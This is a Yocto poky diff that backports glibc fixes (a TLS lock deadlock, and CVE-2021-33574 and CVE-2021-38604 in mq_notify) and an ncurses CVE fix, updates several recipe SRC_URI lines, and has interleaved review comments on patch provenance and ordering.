@@ -0,0 +1,276 @@ +From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 15 Sep 2021 15:16:19 +0100 +Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ + #28357] + +The fix for bug 19329 caused a regression such that pthread_create can +deadlock when concurrent ctors from dlopen are waiting for it to finish. +Use a new GL(dl_load_tls_lock) in pthread_create that is not taken +around ctors in dlopen. + +The new lock is also used in __tls_get_addr instead of GL(dl_load_lock). + +The new lock is held in _dl_open_worker and _dl_close_worker around +most of the logic before/after the init/fini routines. When init/fini +routines are running then TLS is in a consistent, usable state. +In _dl_open_worker the new lock requires catching and reraising dlopen +failures that happen in the critical section. + +The new lock is reinitialized in a fork child, to keep the existing +behaviour and it is kept recursive in case malloc interposition or TLS +access from signal handlers can retake it. It is not obvious if this +is necessary or helps, but avoids changing the preexisting behaviour. + +The new lock may be more appropriate for dl_iterate_phdr too than +GL(dl_load_write_lock), since TLS state of an incompletely loaded +module may be accessed. If the new lock can replace the old one, +that can be a separate change. + +Fixes bug 28357. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-close.c | 6 ++ + elf/dl-open.c | 35 ++++++++- + elf/dl-support.c | 7 ++ + elf/dl-tls.c | 16 ++--- + elf/rtld.c | 1 + + sysdeps/nptl/fork.c | 3 + + sysdeps/generic/ldsodefs.h | 9 ++- + 10 files changed, 235 insertions(+), 12 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5] +Comment: This patch is refreshed for glibc 2.31. 
In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 93ff5c96e9..cfe0f1c0c9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -551,6 +551,9 @@ + size_t tls_free_end; + tls_free_start = tls_free_end = NO_TLS_OFFSET; + ++ /* Protects global and module specitic TLS state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ + /* We modify the list of loaded objects. */ + __rtld_lock_lock_recursive (GL(dl_load_write_lock)); + +@@ -786,6 +789,9 @@ + GL(dl_tls_static_used) = tls_free_start; + } + ++ /* TLS is cleaned up for the unloaded modules. */ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ + #ifdef SHARED + /* Auditing checkpoint: we have deleted all objects. */ + if (__glibc_unlikely (do_audit)) +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 5295e931b0..6ea5dd2457 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -57,6 +57,9 @@ + (non-negative). */ + unsigned int original_global_scope_pending_adds; + ++ /* Set to true if the end of dl_open_worker_begin was reached. */ ++ bool worker_continue; ++ + /* Original parameters to the program and the current environment. */ + int argc; + char **argv; +@@ -473,7 +473,7 @@ + } + + static void +-dl_open_worker (void *a) ++dl_open_worker_begin (void *a) + { + struct dl_open_args *args = a; + const char *file = args->file; +@@ -747,6 +747,36 @@ + if (mode & RTLD_GLOBAL) + add_to_global_resize (new); + ++ args->worker_continue = true; ++} ++ ++static void ++dl_open_worker (void *a) ++{ ++ struct dl_open_args *args = a; ++ ++ args->worker_continue = false; ++ ++ { ++ /* Protects global and module specific TLS state. 
*/ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ ++ struct dl_exception ex; ++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args); ++ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ ++ if (__glibc_unlikely (ex.errstring != NULL)) ++ /* Reraise the error. */ ++ _dl_signal_exception (err, &ex, NULL); ++ } ++ ++ if (!args->worker_continue) ++ return; ++ ++ int mode = args->mode; ++ struct link_map *new = args->map; ++ + /* Run the initializer functions of new objects. Temporarily + disable the exception handler, so that lazy binding failures are + fatal. */ +diff --git a/elf/dl-support.c b/elf/dl-support.c +index 02e2ed72f5..d99c1f1d62 100644 +--- a/elf/dl-support.c ++++ b/elf/dl-support.c +@@ -219,6 +219,13 @@ + list of loaded objects while an object is added to or removed from + that list. */ + __rtld_lock_define_initialized_recursive (, _dl_load_write_lock) ++/* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock) + + + #ifdef HAVE_AUX_VECTOR +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index d554ae4497..9260d2d696 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -443,7 +443,7 @@ + size_t maxgen = 0; + + /* Protects global dynamic TLS related state. */ +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + + /* Check if the current dtv is big enough. 
*/ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) +@@ -517,7 +517,7 @@ + listp = listp->next; + assert (listp != NULL); + } +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + /* The DTV version is up-to-date now. */ + dtv[0].counter = maxgen; +@@ -656,7 +656,7 @@ + + Here the dtv needs to be updated to new_gen generation count. + +- This code may be called during TLS access when GL(dl_load_lock) ++ This code may be called during TLS access when GL(dl_load_tls_lock) + is not held. In that case the user code has to synchronize with + dlopen and dlclose calls of relevant modules. A module m is + relevant if the generation of m <= new_gen and dlclose of m is +@@ -778,11 +778,11 @@ + if (__glibc_unlikely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) + { +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET)) + { + the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET; +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + else if (__glibc_likely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) +@@ -794,7 +794,7 @@ + #else + # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined" + #endif +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + dtv[GET_ADDR_MODULE].pointer.to_free = NULL; + dtv[GET_ADDR_MODULE].pointer.val = p; +@@ -802,7 +802,7 @@ + return (char *) p + GET_ADDR_OFFSET; + } + else +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + struct dtv_pointer result = allocate_and_init (the_map); + dtv[GET_ADDR_MODULE].pointer = result; +@@ -873,7 +873,7 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- /* This may be called without holding the GL(dl_load_lock). 
Reading ++ /* This may be called without holding the GL(dl_load_tls_lock). Reading + arbitrary gen value is fine since this is best effort code. */ + size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); + if (__glibc_unlikely (dtv[0].counter != gen)) +diff --git a/elf/rtld.c b/elf/rtld.c +index 8d2bba3d43..9642eb9c92 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -283,6 +283,7 @@ + #ifdef _LIBC_REENTRANT + ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, ++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + #endif + ._dl_nns = 1, + ._dl_ns = +diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c +index c471f7b15f..021691b9b7 100644 +--- a/sysdeps/nptl/fork.c ++++ b/sysdeps/nptl/fork.c +@@ -125,6 +125,9 @@ + /* Reset the lock the dynamic loader uses to protect its data. */ + __rtld_lock_initialize (GL(dl_load_lock)); + ++ /* Reset the lock protecting dynamic TLS related data. */ ++ __rtld_lock_initialize (GL(dl_load_tls_lock)); ++ + /* Run the handlers registered for the child. */ + __run_fork_handlers (atfork_run_child, multiple_threads); + } +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index d49529da0d..9ec1511bb0 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -369,6 +369,13 @@ + list of loaded objects while an object is added to or removed + from that list. */ + __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock) ++ /* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock) + + /* Incremented whenever something may have been added to dl_loaded. 
*/ + EXTERN unsigned long long _dl_load_adds; +@@ -1153,7 +1160,7 @@ + + /* Add module to slot information data. If DO_ADD is false, only the + required memory is allocated. Must be called with GL +- (dl_load_lock) acquired. If the function has already been called ++ (dl_load_tls_lock) acquired. If the function has already been called + for the link map L with !do_add, then this function will not raise + an exception, otherwise it is possible that it encounters a memory + allocation failure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch new file mode 100644 index 0000000000..cef0ce54ed --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch 
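Review bot: The `From` line names commit 83b5323261bb72313bffcf37476c1b8f0847c736 while the `Upstream-Status` URL points at `h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5`, so the stated provenance of this lock change cannot be checked against a single upstream commit. Presumably one is a branch cherry-pick of the other; the header should say so or the two should be made to agree, for example by adding `Comment: 024a7640ab9e is the branch pick of 83b5323261bb` once that is confirmed. Since the patch was reworked for 2.31 ("multiple src files are shuffled"), a reviewer needs the exact source commit to compare the `dl_open_worker` split and the new `GL(dl_load_tls_lock)` call sites against.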
@@ -0,0 +1,72 @@ +From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001 +From: Andreas Schwab <schwab@linux-m68k.org> +Date: Thu, 27 May 2021 12:49:47 +0200 +Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896) + +Make a deep copy of the pthread attribute object to remove a potential +use-after-free issue. + +Upstream-Status: Backport +CVE: CVE-2021-33574 patch#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + NEWS | 4 ++++ + sysdeps/unix/sysv/linux/mq_notify.c | 15 ++++++++++----- + 2 files changed, 14 insertions(+), 5 deletions(-) + +Index: git/NEWS +=================================================================== +--- git.orig/NEWS ++++ git/NEWS +@@ -7,6 +7,10 @@ using `glibc' in the "product" field. + + Version 2.31.1 + ++ CVE-2021-33574: The mq_notify function has a potential use-after-free ++ issue when using a notification type of SIGEV_THREAD and a thread ++ attribute with a non-default affinity mask. ++ + The following bugs are resolved with this release: + [19519] iconv(1) with -c option hangs on illegal multi-byte sequences + (CVE-2016-10228) +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -135,8 +135,11 @@ helper_thread (void *arg) + (void) __pthread_barrier_wait (¬ify_barrier); + } + else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED) +- /* The only state we keep is the copy of the thread attributes. */ +- free (data.attr); ++ { ++ /* The only state we keep is the copy of the thread attributes. 
*/ ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + } + return NULL; + } +@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sig + if (data.attr == NULL) + return -1; + +- memcpy (data.attr, notification->sigev_notify_attributes, +- sizeof (pthread_attr_t)); ++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes); + } + + /* Construct the new request. */ +@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sig + + /* If it failed, free the allocated memory. */ + if (__glibc_unlikely (retval != 0)) +- free (data.attr); ++ { ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + + return retval; + } diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch new file mode 100644 index 0000000000..396cd7fc0e --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch 
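Review bot: `Upstream-Status: Backport` carries no upstream reference in this patch, unlike 0033–0037 in the same update, which makes the CVE fix harder to audit against its source. The `From` line already gives the commit, so the trailer can read `Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=42d359350510506b87101cf77202fefcbfc790cb]`. On its own this patch also discards the result of `__pthread_attr_copy` and calls `pthread_attr_destroy (data.attr)` on paths where no attribute was allocated, which the description of CVE-2021-33574_2.patch identifies as a null pointer dereference, so the two files must stay together and in order in SRC_URI. `helper_thread` and `mq_notify` continue outside the hunks.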
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+ if (data.attr == NULL)
+ return -1;
+
+- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++ memcpy (data.attr, notification->sigev_notify_attributes,
++ sizeof (pthread_attr_t));
++
++ struct pthread_attr *source =
++ (struct pthread_attr *) (notification->sigev_notify_attributes);
++ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++ cpu_set_t *newp;
++ cpu_set_t *cpuset = source->cpuset;
++ size_t cpusetsize = source->cpusetsize;
++
++ /* alloc a new memory for cpuset to avoid use after free */
++ if (cpuset != NULL && cpusetsize > 0)
++ {
++ newp = (cpu_set_t *) malloc (cpusetsize);
++ if (newp == NULL)
++ {
++ free(data.attr);
++ return -1;
++ }
++
++ memcpy (newp, cpuset, cpusetsize);
++ target->cpuset = newp;
++ }
++ else
++ {
++ target->cpuset = NULL;
++ target->cpusetsize = 0;
++ }
+ }
+
+ /* Construct the new request. */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+ int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+
+ /* If it failed, free the allocated memory. */
+- if (__glibc_unlikely (retval != 0))
++ if (retval != 0 && data.attr != NULL)
+ {
+ pthread_attr_destroy (data.attr);
+ free (data.attr);
diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
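Review bot: The patch header and the code it carries disagree. The message describes handling a failing `__pthread_attr_copy`, yet the mq_notify hunk removes that call and goes back to `memcpy` plus a hand-written deep copy of `cpuset`, so this is an adapted fix rather than the change the quoted upstream message describes. Record that in the tag, e.g. `Upstream-Status: Backport [adapted: cpuset is deep-copied by hand instead of calling __pthread_attr_copy]`, and state the reason in the message (the linked bugzilla attachment is presumably the source). Because the `memcpy` still copies every other member of the attribute shallowly, it is worth confirming that `cpuset` is the only heap-owned member of `struct pthread_attr` in this glibc version. mq_notify's body starts and ends outside the hunk.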
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+Helper thread frees copied attribute on NOTIFY_REMOVED message
+received from the OS kernel. Unfortunately, it fails to check whether
+copied attribute actually exists (data.attr != NULL). This worked
+earlier because free() checks passed pointer before actually
+attempting to release corresponding memory. But
+__pthread_attr_destroy assumes pointer is not NULL.
+
+So passing NULL pointer to __pthread_attr_destroy will result in
+segmentation fault. This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuser <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ to wait until it is done with it. */
+ (void) __pthread_barrier_wait (¬ify_barrier);
+ }
+- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ {
+ /* The only state we keep is the copy of the thread attributes. */
+ pthread_attr_destroy (data.attr);
diff --git a/poky/meta/recipes-core/glibc/glibc_2.31.bb b/poky/meta/recipes-core/glibc/glibc_2.31.bb
index 8742efc36f..4a545cb97d 100644
--- a/poky/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/poky/meta/recipes-core/glibc/glibc_2.31.bb
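Review bot: The backporter's trailer is spelled `Signed-off-by: Armin Kuser <akuster@mvista.com>` here, while both CVE-2021-33574 patches use `Armin Kuster`; correct it so that sign-off searches and provenance audits match all three patches. The inner hunk's context already contains the `{` that CVE-2021-33574_1.patch introduces in helper_thread, so this patch only applies after that one, and a one-line remark in the header would make the ordering dependency explicit. helper_thread continues outside the hunk.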
@@ -67,6 +67,17 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ file://0028-inject-file-assembly-directives.patch \ file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \ file://CVE-2020-29573.patch \ + file://CVE-2021-33574_1.patch \ + file://CVE-2021-33574_2.patch \ + file://CVE-2021-38604.patch \ + file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \ + file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \ + file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \ + file://0033-elf-Add-test-case-for-BZ-19329.patch \ + file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \ + file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \ " S = "${WORKDIR}/git" B = "${WORKDIR}/build-${TARGET_SYS}" diff --git a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch index 52986e61c7..d1835c7a10 100644 --- a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch +++ b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch @@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c return 0; } -+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org" ++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org" /* Print bug-reporting information in the help message. */ static char * more_help (int key, const char *text, void *input) diff --git a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb index 16807eb675..c3681defdc 100644 --- a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb +++ b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb 
@@ -7,7 +7,7 @@ the file /etc/network/interfaces." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" -SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \ file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \ file://99_network \ file://0001-Define-FNM_EXTMATCH-for-musl.patch \ diff --git a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb index 96c47bd2af..e75b82cf1e 100644 --- a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb +++ b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb @@ -24,7 +24,7 @@ IMAGE_FSTYPES = "wic.vmdk" inherit core-image setuptools3 -SRCREV ?= "f22c2d6670d3b6f0d6eaa201fb2f9307a8d503d5" +SRCREV ?= "d752cbcbbeeea9adbcc9aa74def1761f34a9de54" SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \ file://Yocto_Build_Appliance.vmx \ file://Yocto_Build_Appliance.vmxf \ diff --git a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc index 2d2a0b03e3..b6bf48ba79 100644 --- a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc +++ b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \ inherit autotools pkgconfig -SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https" SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c" SRCBRANCH ?= "develop" diff --git a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb index 60dc71f38d..ebb996c8dd 100644 --- a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb +++ b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb 
@@ -44,7 +44,7 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," inherit autotools pkgconfig binconfig-disabled ptest features_check -inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)} +inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)} RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}" diff --git a/poky/meta/recipes-core/meta/cve-update-db-native.bb b/poky/meta/recipes-core/meta/cve-update-db-native.bb index e86c69803f..50052f8532 100644 --- a/poky/meta/recipes-core/meta/cve-update-db-native.bb +++ b/poky/meta/recipes-core/meta/cve-update-db-native.bb @@ -17,7 +17,7 @@ python () { raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.") } -python do_populate_cve_db() { +python do_fetch() { """ Update NVD database with json data feed """ @@ -110,7 +110,9 @@ python do_populate_cve_db() { conn.close() } -do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[file-checksums] = "" +do_fetch[vardeps] = "" def initialize_db(c): c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)") @@ -217,7 +219,6 @@ def update_db(c, jsondata): parse_node_and_insert(c, config, cveId) -addtask do_populate_cve_db before do_fetch -do_populate_cve_db[nostamp] = "1" +do_fetch[nostamp] = "1" EXCLUDE_FROM_WORLD = "1" diff --git a/poky/meta/recipes-core/musl/libucontext_git.bb b/poky/meta/recipes-core/musl/libucontext_git.bb index ec988f1920..71beb80083 100644 --- a/poky/meta/recipes-core/musl/libucontext_git.bb +++ b/poky/meta/recipes-core/musl/libucontext_git.bb 
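Review bot: The two flag resets added after the task body in cve-update-db-native.bb, `do_fetch[file-checksums] = ""` and `do_fetch[vardeps] = ""`, come without a comment, and together with `do_fetch[nostamp] = "1"` they change how the CVE database refresh is scheduled. Anyone auditing why a build did or did not refresh its vulnerability data has to infer the intent from the rename of `do_populate_cve_db` to `do_fetch`. A comment above them such as `# The database download is this recipe's fetch step: always rerun it and do not key it on SRC_URI file checksums or variable dependencies` would record it (wording to be confirmed against the real reason). The task body lies between the hunks and is not visible here.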
@@ -10,7 +10,7 @@ DEPENDS = "" PV = "0.10+${SRCPV}" SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561" -SRC_URI = "git://github.com/kaniini/libucontext \ +SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/musl/musl-obstack.bb b/poky/meta/recipes-core/musl/musl-obstack.bb index 3003935fe5..74de48c2cd 100644 --- a/poky/meta/recipes-core/musl/musl-obstack.bb +++ b/poky/meta/recipes-core/musl/musl-obstack.bb @@ -10,7 +10,7 @@ SECTION = "libs" PV = "1.1" SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4" -SRC_URI = "git://github.com/pullmoll/musl-obstack" +SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl-utils.bb b/poky/meta/recipes-core/musl/musl-utils.bb index dd0ce33061..c30509469c 100644 --- a/poky/meta/recipes-core/musl/musl-utils.bb +++ b/poky/meta/recipes-core/musl/musl-utils.bb @@ -11,7 +11,7 @@ SECTION = "utils" PV = "20170421" SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d" -SRC_URI = "git://github.com/boltlinux/musl-utils" +SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl_git.bb b/poky/meta/recipes-core/musl/musl_git.bb index 82379fd1c5..cbb56f4769 100644 --- a/poky/meta/recipes-core/musl/musl_git.bb +++ b/poky/meta/recipes-core/musl/musl_git.bb @@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}" # mirror is at git://github.com/kraj/musl.git -SRC_URI = "git://git.musl-libc.org/musl \ +SRC_URI = "git://git.musl-libc.org/musl;branch=master \ file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \ file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \ " diff --git a/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch new file mode 100644 index 0000000000..7655200350 
--- /dev/null +++ b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch @@ -0,0 +1,30 @@ +$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $ + +Fix for CVE-2021-39537 from upstream: +https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340 + +CVE: CVE-2021-39537 +Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000 ++++ b/ncurses/tinfo/captoinfo.c +@@ -216,12 +216,15 @@ cvtchar(register const char *sp) + } + break; + case '^': ++ len = 2; + c = UChar(*++sp); +- if (c == '?') ++ if (c == '?') { + c = 127; +- else ++ } else if (c == '\0') { ++ len = 1; ++ } else { + c &= 0x1f; +- len = 2; ++ } + break; + default: + c = UChar(*sp); diff --git a/poky/meta/recipes-core/ncurses/ncurses.inc b/poky/meta/recipes-core/ncurses/ncurses.inc index 7f1834f0dc..ee0b15ecf0 